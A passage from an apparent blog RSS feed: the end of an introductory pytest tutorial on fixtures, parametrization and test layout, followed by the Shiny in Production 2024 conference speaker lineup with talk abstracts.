&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expected &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By using &lt;em&gt;@pytest.fixture&lt;/em&gt;, we have defined a &lt;code&gt;sample_numbers&lt;/code&gt; fixture that returns the list
&lt;code&gt;[1, 2, 3, 4, 5]&lt;/code&gt;.
This fixture can be used in any test function by adding it as an argument. Fixtures are especially
useful when you need to set up more complex objects that multiple tests will use.&lt;/p&gt;
&lt;p&gt;The test output would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -vv test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=============================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==============================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; passed in 0.00s &lt;span style="color:#ff7b72;font-weight:bold"&gt;===============================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="parametrization"&gt;Parametrization&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.pytest.org/en/6.2.x/parametrize.html#parametrize-basics" rel="external"&gt;Parametrization&lt;/a&gt; is an
important feature of pytest which allows us to run a test with multiple sets of parameters.
This is helpful when we want to check the same logic under different conditions without writing
separate test functions.&lt;/p&gt;
&lt;p&gt;Here is how we can test &lt;code&gt;calculate_mean&lt;/code&gt; from the &lt;code&gt;test_my_functions.py&lt;/code&gt; file, by considering
multiple inputs using parametrization:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./test_my_functions.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pytest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;my_functions&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; calculate_mean
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@pytest.mark.parametrize&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;numbers, expected&amp;#34;&lt;/span&gt;, [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;3.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;20.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;21&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;14.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ([&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;], &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_calculate_mean_parametrized&lt;/span&gt;(numbers, expected):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; calculate_mean(numbers)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;assert&lt;/span&gt; result &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; expected
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In this example, &lt;em&gt;@pytest.mark.parametrize&lt;/em&gt; allows us to test &lt;code&gt;calculate_mean&lt;/code&gt; with four different
lists.
Each tuple in the list passed to parametrize represents a different test case with its own numbers
and expected values.&lt;/p&gt;
&lt;p&gt;Then to run the test we use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ pytest -v test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=========================================&lt;/span&gt; test session &lt;span style="color:#79c0ff"&gt;starts&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=========================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers0-3.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 25%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers1-20.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 50%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers2-14.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt; 75%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_my_functions.py::test_calculate_mean_parametrized&lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;numbers3-5.0&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt; PASSED &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;100%&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==========================================&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; passed in 0.01s &lt;span style="color:#ff7b72;font-weight:bold"&gt;==========================================&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output is slightly different here because we are testing for different scenarios and the result
is given for each of them.&lt;/p&gt;
&lt;h3 id="test-organization"&gt;Test organization&lt;/h3&gt;
&lt;p&gt;In the above, our test scripts (&lt;code&gt;test_my_functions.py&lt;/code&gt; and &lt;code&gt;test_failing.py&lt;/code&gt;) and python modules
(&lt;code&gt;my_functions.py&lt;/code&gt;) were all in the same directory. We used this approach for simplicity (as our
focus was on how to write and run tests). In a larger project you may have many test scripts and
python modules, and this approach will quickly become difficult to manage.&lt;/p&gt;
&lt;p&gt;To keep your project organised, it&amp;rsquo;s a good practice to place all tests in a &lt;code&gt;tests/&lt;/code&gt; directory.
This way, when we run pytest we receive a summary of all the project&amp;rsquo;s tests. On making this change,
the file structure for the above example is:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./intro-to-python/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── test_failing.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ └── test_my_functions.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└── venv/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;However, there is a small problem here. The &lt;code&gt;my_functions.py&lt;/code&gt; module must be imported by the
&lt;code&gt;test_my_functions.py&lt;/code&gt; test script. But if we call &lt;code&gt;pytest tests/&lt;/code&gt; from the project root,
&lt;code&gt;my_functions.py&lt;/code&gt; isn&amp;rsquo;t automatically included in the python search path (a collection of
directories from which packages and modules can be imported by the running python session) so it
can&amp;rsquo;t be imported by &lt;code&gt;test_my_functions.py&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;A simple solution for this is to use the following command instead of &lt;code&gt;pytest tests/&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$ python -m pytest tests/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When we call &lt;code&gt;python&lt;/code&gt; directly, any python modules in the current directory are made available on
the python search path.&lt;/p&gt;
&lt;p&gt;A more robust solution (and one we would recommend for larger projects) is to place your python
modules in a package structure, though that is beyond the scope of this introduction to pytest.&lt;/p&gt;
&lt;p&gt;Ready to start testing your code? Enjoy your journey into Python testing, and happy coding!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-pytest/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024: Full speaker lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/</link><pubDate>Thu, 08 Aug 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2024-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference! This year, we&amp;rsquo;re introducing a new lightning talk session. These short 5 minute talks will allow us to showcase many more uses of Shiny in Production. The conference will still feature 6 full length talks, as well as a session of lightning speakers.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;h4 id="cara-thompson---freelance-data-consultant"&gt;&lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; - &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Freelance Data Consultant&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Data-To-Wow: Leveraging Shiny as a no-code solution for high-end parameterised visualisations&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;You&amp;rsquo;ve created a prototype visualisation, fine-tuned it so it looks amazing and perfectly on-brand, and turned the plot code into a function so that you can run it again on different data and highlight different aspects of the story. Others on the team have seen how good the outputs look and they want in on the magic! But they don&amp;rsquo;t want to learn R.&lt;/p&gt;
&lt;p&gt;This talk will offer a behind-the-scenes look at the process of creating a Shiny App that functions as a black box to get straight from the data to high-end parameterised visualisations. We&amp;rsquo;ll start by looking at creating parameterised plot functions using ggplot, before exploring how to bring the data and parameterisation into Shiny to create a seamless no-code data-to-viz workflow for the users.&lt;/p&gt;
&lt;h4 id="gareth-burns---exploristics"&gt;&lt;a href="https://www.linkedin.com/in/drgarethburns/" rel="external"&gt;Gareth Burns&lt;/a&gt; - &lt;a href="https://exploristics.com/" rel="external"&gt;Exploristics&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny in Secondary Education: Supplementing traditional learning resources to allow students to explore statistical concepts&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/gareth@2x.jpg" alt="Photo of Gareth Burns" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The Statisticians in the Pharmaceutical Industry (PSI) Schools Outreach initiative aims at promoting data literacy and statistical concepts to the next generation of Statisticians and Data Scientists. Volunteers attend secondary schools to present from specialised workshops which are designed to be interactive, engaging and aligned to the national curriculum for different age groups.&lt;/p&gt;
&lt;p&gt;The PSI Visualisation Special Interest Group (VIS SIG) created a Shiny application to supplement an existing workshop for Asthma. This workshop aims to introduce the students to analysis of continuous data and make them think about concealing treatment assignment and consider false positive and false negative results. The application allowed electronic data capture the ability to dynamically explore their own data, re-enforcing the statistical concepts and making learning more engaging and accessible.&lt;/p&gt;
&lt;p&gt;Each school is different in terms of class size, computer resources and student abilities, therefore the application needed to be flexible to account for this and enable independent set up by a volunteer instructor. User experience and accessibility were fundamental in the design concepts to ensure the application was appropriate for a classroom environment and data visualisation were at an appropriate level for students.&lt;/p&gt;
&lt;p&gt;In this presentation we discuss the range of issues required to get a Shiny application being implemented by a team of volunteers into a classroom setting. This includes flexible project management for a team of volunteers, use of persistent storage to enable multiple simultaneous users and use of Shiny modules to make code flexible and scalable for future Workshops.&lt;/p&gt;
&lt;h4 id="cassio-felix-jardim---data4shiny"&gt;&lt;a href="http://linkedin.com/in/cassio-f%C3%A9lix-462666b1" rel="external"&gt;Cassio Felix Jardim&lt;/a&gt; - &lt;a href="https://data4shiny.shinyapps.io/data4shiny/" rel="external"&gt;Data4Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Creating any User Interface in Shiny: The Importance of CSS in Shaping Shiny Apps&amp;rsquo; User Interface&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cassio@2x.jpg" alt="Photo of Cassio Felix Jardim" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The main goal of this presentation is to use CSS concepts to assist in building User Interfaces for Dashboards constructed through Programming Languages. In particular, the R language and its Dashboard creation package (shiny package).&lt;/p&gt;
&lt;p&gt;The presentation aims to demonstrate that CSS is crucial for organizing the elements of our Dashboard on the screen and also for the aesthetic aspect of the Dashboard User Interface.&lt;/p&gt;
&lt;p&gt;Through the concepts of CSS Flexbox and CSS Grid, the presentation will take on a tutorial format where the entire process of constructing the user interface of any dashboard will be covered from start to finish. The main idea is to consider elements of storytelling, UI Design, and UX Design in the process of building a Dashboard.&lt;/p&gt;
&lt;p&gt;The Shiny package and its entire ecosystem include various packages that bridge the gap between Data Science and Web Design, especially languages like Html, CSS, and Javascript. Creating this &amp;ldquo;bridge&amp;rdquo; between the worlds of Data Science and Web Design is my main objective.&lt;/p&gt;
&lt;h4 id="katy-morgan---government-internal-audit-agency"&gt;&lt;a href="http://linkedin.com/in/cassio-f%C3%A9lix-462666b1" rel="external"&gt;Katy Morgan&lt;/a&gt; - &lt;a href="https://www.gov.uk/government/organisations/government-internal-audit-agency" rel="external"&gt;Government Internal Audit Agency&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;More than just a chat bot: Tailoring the use of Generative AI within Government Internal Audit Agency with user-friendly R shiny applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/katy@2x.jpg" alt="Photo of Katy Morgan" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Generative AI offers huge potential for driving creativity by suggesting new ideas and perspectives and can also improve efficiency by rapidly processing and extracting insights from large volumes of text. However, using a chatbot-style tool such as ChatGPT can be overwhelming as users have to work out, through trial and error, which questions and instructions give them the outputs they need. The Government Internal Audit Agency’s data analytics team has created two R shiny web applications, each of which simplifies the user’s experience of using generative AI by providing a user-friendly interface and implementing a set of standardised prompts. The Risk Engine walks the user through a stepwise process to explore and articulate the potential risks that might impact any given business objective. The Writing Engine enables users to analyse and generate text in several ways, including generating a draft audit report from rough notes, and summarising common themes from a set of audit reports. This presentation will cover the process of developing and deploying the web applications and the challenges we faced along the way, describing how we tailored the appearance and functionality of the apps to best meet user needs.&lt;/p&gt;
&lt;h4 id="keith-newman---jumping-rivers"&gt;Keith Newman - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Title coming soon&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/keith@2x.jpg" alt="Photo of Keith Newman" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Following a PhD in statistics at Newcastle University, Keith developed software to improve road safety modelling. He enjoys creating Shiny apps and teaching the use of R.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h4 id="vikki-richardson---audit-scotland"&gt;&lt;a href="https://www.linkedin.com/in/vikkirichardsondata/" rel="external"&gt;Vikki Richardson&lt;/a&gt; - &lt;a href="https://audit.scot/" rel="external"&gt;Audit Scotland&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Faster than a Speeding Arrow - R Shiny Optimisation In Practice&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/vikki@2x.jpg" alt="Photo of Vikki Richardson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;The task of optimising your R Shiny apps for great performance can be challenging. Ensuring your code is efficient, using promises where you can, caching resources, and reducing the number of widgets or reactive variables can all help. But datasets can’t be squeezed any more – or can they? By storing larger chunks of data in Arrow format and using the Arrow package for manipulation, we were able to speed up some slower computations by at least one order of magnitude - often more.&lt;/p&gt;
&lt;p&gt;This presentation will cover a case study of migrating a financial data auditing system to Arrow data storage. Because of Arrow, we were able to drop from two Connect servers to one, making management very happy with the cost savings - and delighting our users with the new, snappier application.&lt;/p&gt;
&lt;h3 id="lightning-talks"&gt;Lightning talks&lt;/h3&gt;
&lt;h4 id="yigit-aydede---saint-mary"&gt;&lt;a href="https://yaydede.github.io/" rel="external"&gt;Yigit Aydede&lt;/a&gt; - &lt;a href="https://www.smu.ca/" rel="external"&gt;Saint Mary&amp;rsquo;s University&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Transforming Community Understanding: A Shiny Application for Real-Time Crime and Real Estate Market Insights in Nova Scotia&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/yigit@2x.jpg" alt="Photo of Yigit Aydede" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;This presentation showcases the Nova Scotia Property Insights (NSPI) application, a Shiny-based tool designed to provide comprehensive neighborhood insights through the integration of crime statistics and real estate market data. NSPI leverages the power of interactive maps to offer users a dynamic and engaging experience, facilitating informed decision-making for residents, potential homebuyers, policymakers, and researchers.&lt;/p&gt;
&lt;p&gt;The core functionality of NSPI includes real-time visualization of crime data and property market trends across Nova Scotia neighborhoods. Users can select specific areas on the map to view detailed statistics within customizable radii, offering a granular perspective on local conditions. The application features a user-friendly interface with multiple tabs, including crime type comparisons, real estate market analysis, and historical data trends.&lt;/p&gt;
&lt;p&gt;One of the key innovations of NSPI is its ability to allow users to perform side-by-side neighborhood comparisons. By simply clicking on different map areas, users can generate comparative reports that highlight variations in crime rates and property values. This feature is particularly valuable for those considering relocation or investment in Nova Scotia.&lt;/p&gt;
&lt;p&gt;The presentation will delve into the technical aspects of developing NSPI, including data integration, user authentication, and the creation of a responsive UI. Additionally, we will discuss the challenges encountered and the solutions implemented to ensure data accuracy and user engagement.&lt;/p&gt;
&lt;h4 id="abbie-brookes--jeremy-horne---datacove"&gt;&lt;a href="https://www.linkedin.com/in/abbiebrookes/" rel="external"&gt;Abbie Brookes&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/jeremy-horne-datacove/" rel="external"&gt;Jeremy Horne&lt;/a&gt; - &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny Policies: Dashboards to Aid British Government Decisions&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/abbie@2x.jpg" alt="Photo of Abbie Brookes" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;img src="images/jeremy@2x.jpg" alt="Photo of Jeremy Horne" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In collaboration with Natural England, Datacove developed a bespoke Shiny dashboard for informed government decision-making, covering Health and Wellbeing, Nature, and Sustainability (HWNS). This presentation will outline three major topics: project and data management, our approach to customization, and the route taken to enhance usability.&lt;/p&gt;
&lt;p&gt;The first phase involved project and data management to establish clear expectations. By engaging with Natural England stakeholders, we ensured that the envisioned product met their specific needs and provided a tangible preview of the dashboard&amp;rsquo;s functionality and design. We connected to government APIs and used R to extract, process, and transform multiple sources of HWNS data, bringing this information into one place for localised decision-making.&lt;/p&gt;
&lt;p&gt;In the second phase, we focused on customisation to ensure seamless integration with Natural England&amp;rsquo;s existing webpage. Using the brand guidelines and custom CSS/JavaScript, we ensured that the dashboard had the same look and feel as other products built outside of Shiny. This step was crucial in maintaining a cohesive user experience by complementing their established digital ecosystem. Thus, making it easy to access and increasing the likelihood of use.&lt;/p&gt;
&lt;p&gt;In the third phase, we emphasized making the dashboard accessible to all, regardless of data literacy. We implemented user-friendly design principles, pre-calculated dynamic stats, and intuitive navigation. For example, we built interactive charts using libraries such as Leaflet and Highcharts, this ensured that comparisons were clear and easy to dynamically explore. We will demonstrate our tips for easy interactive visualisations.&lt;/p&gt;
&lt;p&gt;Throughout the project, we adopted best practices in data interpretation and are looking forward to sharing our insights at Shiny in Production.&lt;/p&gt;
&lt;h4 id="david-carayon---inrae"&gt;&lt;a href="https://dcarayon.fr/" rel="external"&gt;David Carayon&lt;/a&gt; - &lt;a href="https://www.inrae.fr/en" rel="external"&gt;INRAE&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The SK8 project: A scalable institutional architecture for managing and hosting Shiny applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/david@2x.jpg" alt="Photo of David Carayon" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Introducing the SK8 Project (Shiny Kubernetes Service), where data scientists, statisticians and engineers from INRAE, the French national research institute for agriculture, food and environment, have teamed up to create a new solution for managing and hosting Shiny applications.&lt;/p&gt;
&lt;p&gt;Shiny has become very popular in our institute, widely used for sharing, showcasing, and democratizing scientific work. However, the enduring challenge of establishing scalable, secure, and sustainable hosting for these apps had yet to be addressed.&lt;/p&gt;
&lt;p&gt;So, after realizing that different research labs had each implemented their own local and makeshift solutions, we put on our thinking caps and decided to craft an open-source institutional solution. Our mission? Break down silos, unite the R community at INRAE, and make hosting applications easy for Shiny developers with no IT backgrounds.&lt;/p&gt;
&lt;p&gt;The SK8 infrastructure allows to host Shiny code on a GitLab instance opened to all INRAE staff. We&amp;rsquo;ve got pipelines (GitLab CI/CD), stability ({renv}), containerization with Docker, scalability and seamless deployment in a Kubernetes cluster. All of this is developed, managed, and maintained by the SK8 team using open-source solutions.&lt;/p&gt;
&lt;p&gt;Using SK8 is a piece of cake – just toss your application code into a dedicated GitLab project and hit the “play” button.&lt;/p&gt;
&lt;p&gt;In this talk, we will be speaking about the project itself, the ecosystem that&amp;rsquo;s making it all happen and how you could replicate this in your own company.&lt;/p&gt;
&lt;h4 id="juan-ramon-vallarta-robledo---find"&gt;&lt;a href="http://www.linkedin.com/in/juanvallarta" rel="external"&gt;Juan Ramon Vallarta Robledo&lt;/a&gt; - &lt;a href="https://www.finddx.org/" rel="external"&gt;FIND&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Chagas diagnostic algorithms: an online application to estimate cost and effectiveness of diagnostic algorithms for Chagas disease&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/juan@2x.jpg" alt="Photo of David Carayon" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Chagas disease, caused by the Trypanosoma cruzi parasite, is a significant public health concern in Latin America, with an estimated 6-7 million people affected and increasing incidence rates worldwide. Examining the available diagnostic tests and their cost-effectiveness is essential for improving early diagnosis, which is crucial in managing the disease and preventing severe chronic conditions. To address this, FIND, a non-profit organization dedicated to facilitating equitable access to reliable diagnosis, developed &lt;a href="https://github.com/finddx/chagaspathway" rel="external"&gt;Chagaspathways&lt;/a&gt; to provide guidance for Chagas disease testing.&lt;/p&gt;
